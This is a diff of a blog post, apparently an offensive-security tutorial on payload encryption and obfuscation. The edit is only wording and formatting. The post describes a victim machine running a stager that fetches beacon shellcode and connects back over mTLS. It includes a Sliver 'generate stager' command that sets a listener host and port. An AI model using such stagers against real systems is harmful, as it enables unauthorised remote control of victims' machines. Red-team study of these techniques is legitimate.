nirajkharel/nirajkharel.github.io/_posts/2024-04-27-payload-encryption-and-obfuscation.md

 The victim machine runs stager delivered through port 8080, receives the beacon shellcode and connects back via mTLS.

-We can either use sliver **generate stager** command or msfvenom to generate our shellcode.
-For sliver stagers, it just call the msfvenom APIs, so there would be no difference on the shellcode.
+We can either use Sliver's **generate stager** command or `msfvenom` to generate our shellcode.
+For Sliver stagers, it simply calls the `msfvenom` APIs, so there would be no difference in the generated shellcode.

 **Using Sliver**
 ```bash
 generate stager --lhost 192.168.1.86 --lport 8080 --protocol http --save /tmp